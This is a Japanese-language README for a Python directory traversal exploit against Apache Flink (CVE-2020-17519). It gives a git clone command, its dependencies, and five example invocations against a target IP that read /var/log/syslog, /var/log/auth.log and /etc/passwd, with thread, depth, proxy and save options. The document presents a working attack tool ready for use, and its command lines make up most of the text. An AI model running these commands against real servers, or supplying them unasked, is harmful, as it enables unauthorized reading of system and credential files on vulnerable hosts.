
Apache FlinkのCVE-2020-17519用のPythonベースのディレクトリトラバーサルエクスプロイト。マルチスレッド、プロキシサポート、設定可能な深さを備え、脆弱なターゲットからログファイルを取得します。
ディレクトリトラバーサル技術を使用して、ターゲットURLからログファイルを要求するPythonツールです。リアルタイムの進行状況を表示し、プロキシ設定をサポートし、必要に応じて有効な応答を保存します。
requests および pwntools (pwn)argparse, os, concurrent.futures, threadinggit clone https://github.com/GazettEl/CVE-2020-17519.git
pip install requests pwntools
このツールは、さまざまなオプションを指定してコマンドラインから実行できます。以下にいくつかの例を示します。
例1: 単一のファイルパスを要求する
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-path /var/log/syslog --threads 1 --save
例2: リストから複数のファイルパスを要求する
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-list file_paths.txt --threads 4 --proxy none
例3: プロキシを無効にして実行する
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 10 --file-path /var/log/auth.log --threads 2 --proxy none
例4: ファイルリストを使用し、有効な応答を保存する
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 15 --file-list paths.txt --threads 4 --save
例5: 深さを増やして単一のファイルを要求する
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 20 --file-path /etc/passwd --threads 1
詳細については、ソースコードとインラインコメントを参照してください。